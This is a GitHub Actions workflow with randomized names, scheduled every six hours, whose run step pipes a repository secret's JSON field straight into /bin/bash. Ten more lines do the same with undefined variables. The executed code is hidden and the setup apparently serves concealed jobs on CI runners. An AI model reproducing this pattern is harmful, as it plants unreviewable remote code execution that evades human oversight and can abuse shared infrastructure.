name: piqijing4567

on:
  workflow_dispatch:
  schedule:
    - cron: '52 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: piqijing4567
        env:
          u126: ${{ secrets.u126 }}
        run: |
          echo $u126 | jq -r .sc63484 | /bin/bash
          echo $zcuk03502 | jq -r .mwa6487 | /bin/bash
          echo $x551 | jq -r .f8564 | /bin/bash
          echo $bcvmj1124 | jq -r .xfnmb4863 | /bin/bash
          echo $yphq71965 | jq -r .yjo17617 | /bin/bash
          echo $j72 | jq -r .prvf868 | /bin/bash
          echo $tgne95 | jq -r .tbgeh0667 | /bin/bash
          echo $c26166 | jq -r .g178 | /bin/bash
          echo $qwu5667 | jq -r .kvhxk91700 | /bin/bash
          echo $au1708 | jq -r .mlu7576 | /bin/bash
          echo $x1529 | jq -r .f01 | /bin/bash

